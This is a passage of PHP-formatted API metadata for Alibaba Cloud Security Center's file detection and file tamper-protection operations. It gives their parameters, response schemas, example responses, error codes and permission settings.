event'."\n" ."\n" .'- **ThreatLevel**: the level of the threat intelligence event'."\n" ."\n" .'- **Basic**: the basic information about the report (the scan result)'."\n" ."\n" .'- **Sandbox**: the cloud sandbox check report', 'type' => 'string', 'required' => false, 'example' => 'Basic,,ThreatTypes,Intelligences,Sandbox', 'title' => ''], ], [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The event ID that corresponds to the file to be detected.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '81****', 'title' => ''], ], [ 'name' => 'FileHash', 'in' => 'query', 'schema' => ['description' => 'The hash value of the file to be detected.', 'type' => 'string', 'required' => false, 'example' => 'b63917332950e5d219d0737ffe31****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'SourceType', 'in' => 'query', 'schema' => ['description' => 'The data source type. Valid values:'."\n" ."\n" .'- **machine**: host alerts'."\n" ."\n" .'- **object\\_scan**: file detection alerts', 'type' => 'string', 'required' => false, 'example' => 'object_scan', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'FileHash' => ['description' => 'The hash value of the file.', 'type' => 'string', 'example' => 'c42b5f6bde0b730ece2923266333****', 'title' => ''], 'ThreatLevel' => ['description' => 'The threat level. Valid values:'."\n" ."\n" .'- **0**: normal'."\n" ."\n" .'- **1**: suspicious'."\n" ."\n" .'- **2**: high', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'Sandbox' => ['description' => 'The details of the cloud sandbox check results.', 'type' => 'string', 'example' => '{\'BehaviorData\': {}, \'ProcessData\': {}, \'SandboxData\': {}, \'AttackData\': [], \'NetworkData\': {}, \'SolutionData\': {}, \'FileData\': {}}', 'title' => ''], 'Basic' => ['description' => 'The basic information about the detected file.', 'type' => 'string', 'example' => ' {'."\n" .' "sha256": "",'."\n" .' "sha512": "",'."\n" .' "source": "aegis",'."\n" .' "gmt_first_submit": "",'."\n" .' "sha1": "",'."\n" .' "virus_result": "",'."\n" .' "webshell_result": "",'."\n" .' "gmt_update": "",'."\n" .' "sandbox_result": "2",'."\n" .' "fileSize": "363752",'."\n" .' "virus_name": "",'."\n" .' }', 'title' => ''], 'Filename' => ['description' => 'The name of the file.', 'type' => 'string', 'example' => '挖矿程序', 'title' => ''], 'HasData' => ['description' => 'Indicates whether the file data exists in the cloud sandbox. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Intelligences' => ['description' => 'The threat intelligence event, which is a JSON array.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'- The threat type. The value is an array. The elements in the array can be DDoS trojans, mining programs, network layer intrusions, network service scans, network sharing and discovery, mining pools, exploits, dark webs, malicious logons, malicious download sources, C\\&C servers, webshells, and web attacks.', 'type' => 'string', 'example' => '["挖矿程序"]', 'title' => ''], 'ThreatTypes' => ['description' => 'The risk tags and server tags that are generated by analyzing threat intelligence and security events. The value is a string array. The array includes the following elements:'."\n" ."\n" .'- **threat\\_type\\_desc**: the threat type.'."\n" ."\n" .'- **last\\_find\\_time**: the last time the threat was detected.'."\n" ."\n" .'- **risk\\_type**: indicates whether the tag is malicious. The value 0 indicates that the tag is not malicious. The value 1 indicates that the tag is malicious. The value -1 indicates that whether the tag type is malicious is unknown.'."\n" ."\n" .'- **threat\\_type**: the threat type. The value is an array. The elements in the array can be network layer intrusion, network service scanning, network sharing and discovery, mining pool, exploits, darknet, malicious logon, malicious download source, central control, web shell, and web attack.', 'type' => 'string', 'example' => '[{"threat_type_desc": "挖矿程序","risk_type": 1,"threat_type": ""}]', 'title' => ''], 'ShowTab' => ['description' => 'Indicates whether the check report is displayed. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB393XXXX', 'title' => ''], 'Code' => ['description' => 'The status code that is returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"FileHash\\": \\"c42b5f6bde0b730ece2923266333****\\",\\n \\"ThreatLevel\\": 2,\\n \\"Sandbox\\": \\"{\'BehaviorData\': {}, \'ProcessData\': {}, \'SandboxData\': {}, \'AttackData\': [], \'NetworkData\': {}, \'SolutionData\': {}, \'FileData\': {}}\\",\\n \\"Basic\\": \\" {\\\\n \\\\\\"sha256\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"sha512\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"source\\\\\\": \\\\\\"aegis\\\\\\",\\\\n \\\\\\"gmt_first_submit\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"sha1\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"virus_result\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"webshell_result\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"gmt_update\\\\\\": \\\\\\"\\\\\\",\\\\n \\\\\\"sandbox_result\\\\\\": \\\\\\"2\\\\\\",\\\\n \\\\\\"fileSize\\\\\\": \\\\\\"363752\\\\\\",\\\\n \\\\\\"virus_name\\\\\\": \\\\\\"\\\\\\",\\\\n }\\",\\n \\"Filename\\": \\"挖矿程序\\",\\n \\"HasData\\": true,\\n \\"Intelligences\\": \\"[\\\\\\"挖矿程序\\\\\\"]\\",\\n \\"ThreatTypes\\": \\"[{\\\\\\"threat_type_desc\\\\\\": \\\\\\"挖矿程序\\\\\\",\\\\\\"risk_type\\\\\\": 1,\\\\\\"threat_type\\\\\\": \\\\\\"\\\\\\"}]\\",\\n \\"ShowTab\\": true\\n },\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB393XXXX\\",\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"Success\\": true\\n}","type":"json"}]', 'title' => 'GetFileDetectReport', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileDetectReport'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileDetectReport', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetFileDetectResult' => [ 'summary' => 'Retrieves file detection results in batches using `HashKey` values.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '140704', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '183.46.XX.XX', 'title' => ''], ], [ 'name' => 'HashKeyList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'An array of up to 100 unique file identifiers.', 'type' => 'array', 'items' => ['description' => 'The unique file identifier.', 'type' => 'string', 'required' => false, 'example' => '0a212417e65c26ff133cfff28f9c****', 'title' => ''], 'required' => true, 'maxItems' => 200, 'title' => '', 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of file to detect. Valid values:'."\n" ."\n" .'- **0**: malicious file detection'."\n" ."\n" .'- **6**: Skill compressed package detection', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response object.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique ID of the request, generated by Alibaba Cloud. Use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'ResultList' => [ 'description' => 'An array of file detection result objects.', 'type' => 'array', 'items' => [ 'description' => 'A file detection result object.', 'type' => 'object', 'properties' => [ 'HashKey' => ['description' => 'The unique file identifier.', 'type' => 'string', 'example' => '0a212417e65c26ff133cfff28f6c****', 'title' => ''], 'Result' => ['description' => 'The file detection result. Valid values:'."\n" ."\n" .'- **0**: Safe file'."\n" ."\n" .'- **1**: Suspicious file'."\n" ."\n" .'- **3**: Detection in progress.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Score' => ['description' => 'The file\'s detection score. The score ranges and their corresponding risk levels are as follows:'."\n" ."\n" .'- 0–60: Safe'."\n" ."\n" .'- 61–70: Risk'."\n" ."\n" .'- 71–80: Suspicious'."\n" ."\n" .'- 81–100: Malicious'."\n" ."\n" .'>'."\n" ."\n" .'A higher score indicates a higher level of suspicion.'."\n" ."\n" .'>', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'VirusType' => ['description' => 'The type of virus. Valid values:'."\n" ."\n" .'- **Trojan**: Trojan horse'."\n" ."\n" .'- **WebShell**: Webshell'."\n" ."\n" .'- **Backdoor**: Backdoor'."\n" ."\n" .'- **RansomWare**: Ransomware'."\n" ."\n" .'- **Scanner**: Scanner'."\n" ."\n" .'- **Stealer**: Information stealer'."\n" ."\n" .'- **Malbaseware**: Contaminated basic software'."\n" ."\n" .'- **Hacktool**: Hacking tool'."\n" ."\n" .'- **Engtest**: Engine test program'."\n" ."\n" .'- **Downloader**: Trojan downloader'."\n" ."\n" .'- **Virus**: Virus'."\n" ."\n" .'- **Miner**: Mining program'."\n" ."\n" .'- **Worm**: Worm'."\n" ."\n" .'- **DDoS**: DDoS Trojan'."\n" ."\n" .'- **Malware**: Malicious program'."\n" ."\n" .'- **RiskWare**: Riskware'."\n" ."\n" .'- **Proxytool**: Proxy tool'."\n" ."\n" .'- **Suspicious**: Suspicious program'."\n" ."\n" .'- **MalScript**: Malicious script'."\n" ."\n" .'- **Rootkit**: Rootkit'."\n" ."\n" .'- **Exploit**: Exploit'."\n" ."\n" .'> This parameter is not returned when `Result` is `0` or `3`.', 'type' => 'string', 'example' => 'WebShell', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate an error. Use this code to determine the cause of the error.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed message returned.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Ext' => ['description' => 'The extension field, which provides additional details about the detection result.', 'type' => 'string', 'example' => '{'."\n" .' "HighLight":'."\n" .' ['."\n" .' ['."\n" .' 23245,'."\n" .' 23212'."\n" .' ]'."\n" .' ],'."\n" .' "FileLabel":'."\n" .' ['."\n" .' "PE32",'."\n" .' "Zip",'."\n" .' "SFX",'."\n" .' "encrypted"'."\n" .' ]'."\n" .'}', 'title' => ''], 'Compress' => ['description' => 'Indicates whether the file is identified as a compressed package.'."\n" ."\n" .'- **true**: The file is a compressed package.'."\n" ."\n" .'- **false**: The file is not a compressed package.'."\n" ."\n" .'> This parameter is not returned when `Type` is `6`.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RequestTooFrequently', 'errorMessage' => 'Request too frequently, please try again later', 'description' => ''], ['errorCode' => 'GetResultFail', 'errorMessage' => 'Get result fail, found no detect record for this file or result has been expired', 'description' => ''], ['errorCode' => 'InvalidApiDetectType', 'errorMessage' => 'Unsupported Api Detect Type.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'SystemBusy', 'errorMessage' => 'System busy, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"ResultList\\": [\\n {\\n \\"HashKey\\": \\"0a212417e65c26ff133cfff28f6c****\\",\\n \\"Result\\": 0,\\n \\"Score\\": 100,\\n \\"VirusType\\": \\"WebShell\\",\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"Ext\\": \\"{\\\\n \\\\\\"HighLight\\\\\\":\\\\n [\\\\n [\\\\n 23245,\\\\n 23212\\\\n ]\\\\n ],\\\\n \\\\\\"FileLabel\\\\\\":\\\\n [\\\\n \\\\\\"PE32\\\\\\",\\\\n \\\\\\"Zip\\\\\\",\\\\n \\\\\\"SFX\\\\\\",\\\\n \\\\\\"encrypted\\\\\\"\\\\n ]\\\\n}\\",\\n \\"Compress\\": false\\n }\\n ]\\n}","type":"json"}]', 'title' => 'GetFileDetectResult', 'description' => 'You can retrieve detection results only for submitted files. Results are retained for 5 hours and can be queried multiple times during this period. To submit a file for detection, call the [CreateFileDetect](~~CreateFileDetect~~) operation.'."\n" ."\n" .'### Unique file identifier'."\n" ."\n" .'All file detection operations use the `HashKey` parameter. `HashKey` is a unique file identifier used to query the corresponding file detection result.'."\n" ."\n" .'For Skill compressed package detection (when Type is 6), obtain the `HashKey` from the response of the [CreateFileDetect](~~CreateFileDetect~~) operation.'."\n" ."\n" .'For malicious file detection (when Type is 0), the `HashKey` must be the MD5 or SHA-256 hash of the entire file.'."\n" ."\n" .'### Query detection results'."\n" ."\n" .'In a malicious file detection scenario (when `Type` is `0`), you can filter files by their attributes using the `FileLabel` field in the `Ext` field. For example, you can combine the `encrypted` and `Zip` attributes to filter for encrypted compressed packages. Supported file tags for compressed packages include: `Zip`, `RAR`, `7-Zip`, `XAR`, `ZLib`, `GZip`, and `tar`. You can also use the `Highlight` field in the `Ext` field to locate malicious code segments in `WebShell` files. The `Highlight` field is a list in which each element represents a code range. The numbers indicate the character offset from the beginning of the file.'."\n" ."\n" .'In a Skill compressed package detection scenario (when `Type` is `6`), you can retrieve the detection report from the `Ext` field. This report includes results from deep intent analysis, prompt injection detection, sensitive information recognition, and malicious script detection. To query the details of an individual file within the compressed package, call the [ListCompressFileDetectResult](~~ListCompressFileDetectResult~~) operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '1000', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileDetectResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileDetectResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetFileProtectClientEvent' => [ 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '131231', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8****'], 'Data' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test-000', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp when the event first occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'LatestTime' => ['description' => 'The time when the event most recently occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Status' => [ 'description' => 'The event status. Valid values:'."\n" ."\n" .'- 0: unhandled '."\n" .'- 1: handled'."\n" .'- 2: whitelisted.', 'type' => 'integer', 'format' => 'int32', 'enum' => ['0', '1', '2'], 'example' => '1', 'title' => '', ], 'ProcPath' => ['description' => 'The process path.', 'type' => 'string', 'example' => '/bin/bash33', 'title' => ''], 'FilePath' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/usr/local', 'title' => ''], 'CmdLine' => ['description' => 'The command line of the event.', 'type' => 'string', 'example' => '["touch","/usr/local/aaaa"]', 'title' => ''], 'FilePermission' => ['description' => 'The process permissions.', 'type' => 'string', 'example' => 'rwxr-xr-x', 'title' => ''], 'Operation' => ['description' => 'The operation that the process performed on the file.', 'type' => 'string', 'example' => 'DELETE', 'title' => ''], 'Id' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '3454', 'title' => ''], 'AlertLevel' => [ 'description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" .'- 1: reminder'."\n" .'- 2: suspicious'."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'enum' => ['0', '1', '2', '3'], 'example' => '0', 'title' => '', ], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'i-wz92q7m5hsbgfhdss***', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the associated instance.', 'type' => 'string', 'example' => '17.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'HandleTime' => ['description' => 'The time when the event was handled.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'ProcessId' => ['description' => 'The process ID of the event.', 'type' => 'string', 'example' => '3453', 'title' => ''], 'Platform' => ['description' => 'The operating system type.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'UserId' => ['description' => 'The user ID of the event.', 'type' => 'string', 'example' => '12', 'title' => ''], 'UserName' => ['description' => 'The username of the event.', 'type' => 'string', 'example' => 'root', 'title' => ''], 'RuleAction' => ['description' => 'The action of the blocking rule.', 'type' => 'string', 'example' => 'block', 'title' => ''], 'Count' => ['description' => 'The number of times the alert occurred.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Get tamper-proofing alert event details', 'summary' => 'Retrieves the details of a file protection event.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectClientEvent', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8****\\",\\n \\"Data\\": {\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"RuleName\\": \\"test-000\\",\\n \\"FirstTime\\": 1694576692000,\\n \\"LatestTime\\": 1694576692000,\\n \\"Status\\": 1,\\n \\"ProcPath\\": \\"/bin/bash33\\",\\n \\"FilePath\\": \\"/usr/local\\",\\n \\"CmdLine\\": \\"[\\\\\\"touch\\\\\\",\\\\\\"/usr/local/aaaa\\\\\\"]\\",\\n \\"FilePermission\\": \\"rwxr-xr-x\\",\\n \\"Operation\\": \\"DELETE\\",\\n \\"Id\\": 3454,\\n \\"AlertLevel\\": 0,\\n \\"InstanceName\\": \\"i-wz92q7m5hsbgfhdss***\\",\\n \\"InternetIp\\": \\"17.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"HandleTime\\": 1694576692000,\\n \\"Remark\\": \\"test\\",\\n \\"ProcessId\\": \\"3453\\",\\n \\"Platform\\": \\"linux\\",\\n \\"UserId\\": \\"12\\",\\n \\"UserName\\": \\"root\\",\\n \\"RuleAction\\": \\"block\\",\\n \\"Count\\": 2\\n }\\n}","type":"json"}]', ], 'GetFileProtectClientEventDashboard' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start timestamp of the query.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1648438617000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end timestamp of the query.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1656038940435', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to return.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'string', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****'], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'OneDayFileChangeCount' => ['description' => 'The number of file tamper-proofing events for today.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'RecentFileChangeCount' => ['description' => 'The number of file tamper-proofing events in the last 15 days.', 'type' => 'integer', 'format' => 'int32', 'example' => '33', 'title' => ''], 'ServerCount' => ['description' => 'The number of affected servers.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'FileTypeStats' => [ 'description' => 'The event statistics grouped by file type.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The file type name.', 'type' => 'string', 'example' => 'txt', 'title' => ''], 'Num' => ['description' => 'The count.', 'type' => 'integer', 'format' => 'int64', 'example' => '60', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'FilePathStats' => [ 'description' => 'The tamper-proofing event statistics grouped by file path.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/usr/a', 'title' => ''], 'Num' => ['description' => 'The total number of events.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ProcessNameStats' => [ 'description' => 'The event statistics grouped by process name.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The process name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'Num' => ['description' => 'The number of events.', 'type' => 'integer', 'format' => 'int64', 'example' => '50', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve statistics on tamper-proofing events', 'summary' => 'Retrieves the dashboard data of file tamper-proofing events.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectClientEventDashboard', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\",\\n \\"Data\\": {\\n \\"OneDayFileChangeCount\\": 12,\\n \\"RecentFileChangeCount\\": 33,\\n \\"ServerCount\\": 4,\\n \\"FileTypeStats\\": [\\n {\\n \\"Key\\": \\"txt\\",\\n \\"Num\\": 60\\n }\\n ],\\n \\"FilePathStats\\": [\\n {\\n \\"Key\\": \\"/usr/a\\",\\n \\"Num\\": 10\\n }\\n ],\\n \\"ProcessNameStats\\": [\\n {\\n \\"Key\\": \\"test\\",\\n \\"Num\\": 50\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'GetFileProtectClientRule' => [ 'summary' => 'Retrieves the details of a file protection rule.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925****'], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'RuleAction' => ['description' => 'The action that the rule takes on the client. Valid values:'."\n" ."\n" .'- monitor: alert'."\n" ."\n" .'- block: block'."\n" ."\n" .'- pass: allow.', 'type' => 'string', 'example' => 'pass', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'SwitchId' => ['description' => 'The switch ID that corresponds to the rule.', 'type' => 'string', 'example' => 'USER-CONTAINER-RULE-SWITCH-TYPE_***', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '3119', 'title' => ''], 'AlertLevel' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'FileOps' => [ 'description' => 'The operations performed on files.', 'type' => 'array', 'items' => ['description' => 'The operations performed on files. Valid values:'."\n" .'1. WRITE: write'."\n" .'2. READ: read'."\n" .'3. DELETE: delete'."\n" .'4. RENAME: rename'."\n" .'5. CHMOD: modify permissions.', 'type' => 'string', 'example' => 'WRITE', 'title' => ''], 'title' => '', 'example' => '', ], 'FileTypes' => [ 'description' => 'The protected file types.', 'type' => 'array', 'items' => ['description' => 'The protected file types.', 'type' => 'string', 'example' => 'txt', 'title' => ''], 'title' => '', 'example' => '', ], 'FilePaths' => [ 'description' => 'The monitored file paths. Wildcards are supported.', 'type' => 'array', 'items' => ['description' => 'The monitored file paths. Wildcards are supported.', 'type' => 'string', 'example' => '/usr/*', 'title' => ''], 'title' => '', 'example' => '', ], 'ProcPaths' => [ 'description' => 'The process paths. Wildcards are supported.', 'type' => 'array', 'items' => ['description' => 'The process paths. Wildcards are supported.', 'type' => 'string', 'example' => '/usr/local/*', 'title' => ''], 'title' => '', 'example' => '', ], 'ExcludeUsers' => [ 'description' => 'The list of excluded users.', 'type' => 'array', 'items' => ['description' => 'The list of excluded users.', 'type' => 'string', 'example' => 'root', 